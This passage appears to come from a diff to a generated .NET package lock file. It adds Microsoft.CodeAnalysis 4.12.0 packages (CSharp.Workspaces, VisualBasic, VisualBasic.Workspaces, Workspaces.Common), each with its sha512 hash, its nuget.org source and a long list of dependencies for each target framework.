"System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.CodeAnalysis.CSharp.Workspaces", "id": "Microsoft.CodeAnalysis.CSharp.Workspaces", "version": "4.12.0", "sha512": "sha512-YwFqDAYHJrf02FyGU8nQnaWNryZXuDV0r8pVgWjRtxAFDWfaU5CZxvU/4NsS6GSnEsWp6W/e49QMHsDXTJW/KA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net47": 
["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", 
"System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", 
"System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", 
"System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"]}, 
"targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.CodeAnalysis.VisualBasic", "id": "Microsoft.CodeAnalysis.VisualBasic", "version": "4.12.0", "sha512": "sha512-le1vRWFDjf9mYrVwhxw+rNZpRg/AvBi9aK+4zfn47qN2S7XPXtDwdz/dvxVg8bKJMfkwK1WPi2Bvlc7naPdaYg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", 
"System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", 
"System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": 
[], "framework_list": []}, + {"name": "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "id": "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "version": "4.12.0", "sha512": "sha512-j/XDFfNu38FSTJOIhkB8pvLWNVNqNhaZTRtLuH/WsHUsnYfIztaDW9seR7OsUBF5LuZIKQ9uaCrj7p+0/BgPkw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", 
"System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", 
"System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", 
"System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", 
"Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.CodeAnalysis.Workspaces.Common", "id": "Microsoft.CodeAnalysis.Workspaces.Common", "version": "4.12.0", "sha512": "sha512-bzZOMF3kAtQhc5kcUILy0GyhgePksk/j9DJtlvFex1UYNgXJUoEkA6IUGootH1Z6GH4Z5BuLNXiFzsz9oJwbcQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], 
"net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", 
"System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.Common", 